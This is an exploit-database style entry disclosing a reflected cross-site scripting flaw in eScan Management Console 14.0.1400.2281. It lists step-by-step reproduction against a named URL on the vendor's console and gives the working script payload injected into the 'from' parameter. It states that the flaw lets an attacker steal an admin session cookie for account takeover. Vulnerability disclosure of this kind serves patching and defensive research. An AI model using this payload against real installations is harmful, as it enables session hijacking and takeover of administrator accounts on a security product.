Escan management console 14.0.1400.2281 cross site scripting Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-05-23 |
Type : webapps |
Platform : windows
This exploit / vulnerability Escan management console 14.0.1400.2281 cross site scripting is for educational purposes only and if it is used you will do on your own risk!
1. Login into the eScan Management Console with a valid user credential.
2. Navigate to URL:
https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P=
3. Now, Inject the Cross Site Scripting Payload in "from" parameter as
shown below and a valid XSS pop up appeared.
https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P=
4. By exploiting this vulnerability, any arbitrary attacker could have
stolen an admin user session cookie to perform account takeover.
Escan management console 14.0.1400.2281 cross site scripting